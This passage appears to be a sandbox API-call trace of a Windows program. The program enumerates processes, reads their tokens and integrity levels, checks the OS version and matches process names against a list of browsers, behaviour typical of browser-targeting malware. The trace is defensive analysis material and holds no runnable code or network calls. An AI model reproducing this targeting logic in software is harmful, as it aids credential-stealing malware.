TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.892] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.892] GetLastError () returned 0x7a [0220.893] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.893] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.893] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.893] CloseHandle (hObject=0xb8) returned 1 [0220.893] CloseHandle (hObject=0xb4) returned 1 [0220.893] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.893] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0220.893] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.893] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.893] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.894] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0220.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0220.894] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.894] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.894] GetLastError () returned 0x7a [0220.894] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.894] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.894] CloseHandle (hObject=0xb8) returned 1 [0220.894] CloseHandle (hObject=0xb4) returned 1 [0220.894] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0220.894] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167830, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.894] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.894] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.894] GetLastError () returned 0x7a [0220.895] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.895] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.895] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.895] CloseHandle (hObject=0xb8) returned 1 [0220.895] CloseHandle (hObject=0xb4) returned 1 [0220.895] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.895] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.895] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.895] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.895] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.896] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0220.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0220.896] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.896] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.896] GetLastError () returned 0x7a [0220.896] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.896] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.896] CloseHandle (hObject=0xb8) returned 1 [0220.896] CloseHandle (hObject=0xb4) returned 1 [0220.896] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0220.896] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1679a0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.896] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.896] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.896] GetLastError () returned 0x7a [0220.897] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.897] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.897] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.897] CloseHandle (hObject=0xb8) returned 1 [0220.897] CloseHandle (hObject=0xb4) returned 1 [0220.897] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0220.897] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0220.897] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0220.897] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0220.897] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0220.897] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0220.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0220.897] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.897] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.898] GetLastError () returned 0x7a [0220.898] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.898] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.898] CloseHandle (hObject=0xb8) returned 1 [0220.898] CloseHandle (hObject=0xb4) returned 1 [0220.898] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0220.898] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167b20, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.898] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.898] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.898] GetLastError () returned 0x7a [0220.898] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.898] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.898] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.898] CloseHandle (hObject=0xb8) returned 1 [0220.898] CloseHandle (hObject=0xb4) returned 1 [0220.899] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0220.899] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0220.899] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0220.899] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0220.899] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0220.899] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0220.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0220.899] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.899] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.899] GetLastError () returned 0x7a [0220.899] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.899] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.899] CloseHandle (hObject=0xb8) returned 1 [0220.899] CloseHandle (hObject=0xb4) returned 1 [0220.899] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0220.899] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167c78, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.900] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.900] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.900] GetLastError () returned 0x7a [0220.900] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.900] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.900] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.900] CloseHandle (hObject=0xb8) returned 1 [0220.900] CloseHandle (hObject=0xb4) returned 1 [0220.900] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0220.900] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0220.900] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0220.900] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0220.900] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0220.900] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0220.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0220.901] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.901] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.901] GetLastError () returned 0x7a [0220.901] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.901] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.901] CloseHandle (hObject=0xb8) returned 1 [0220.901] CloseHandle (hObject=0xb4) returned 1 [0220.901] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0220.901] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167dc8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.901] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.901] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.901] GetLastError () returned 0x7a [0220.901] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.901] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.901] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.901] CloseHandle (hObject=0xb8) returned 1 [0220.901] CloseHandle (hObject=0xb4) returned 1 [0220.902] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0220.902] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0220.902] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0220.902] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0220.902] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0220.902] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0220.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0220.902] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.902] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.902] GetLastError () returned 0x7a [0220.902] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.902] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.902] CloseHandle (hObject=0xb8) returned 1 [0220.902] CloseHandle (hObject=0xb4) returned 1 [0220.902] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0220.902] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167f18, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.902] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.903] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.903] GetLastError () returned 0x7a [0220.903] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.903] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.903] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.903] CloseHandle (hObject=0xb8) returned 1 [0220.903] CloseHandle (hObject=0xb4) returned 1 [0220.925] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.925] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0220.925] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.925] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.925] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.925] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0220.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0220.925] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.925] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.925] GetLastError () returned 0x7a [0220.925] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.925] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.925] CloseHandle (hObject=0xb8) returned 1 [0220.925] CloseHandle (hObject=0xb4) returned 1 [0220.925] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0220.925] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x168078, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.925] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.925] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.925] GetLastError () returned 0x7a [0220.925] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.925] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.925] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.925] CloseHandle (hObject=0xb8) returned 1 [0220.925] CloseHandle (hObject=0xb4) returned 1 [0220.926] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0220.926] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0220.926] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0220.926] lstrcmpiW 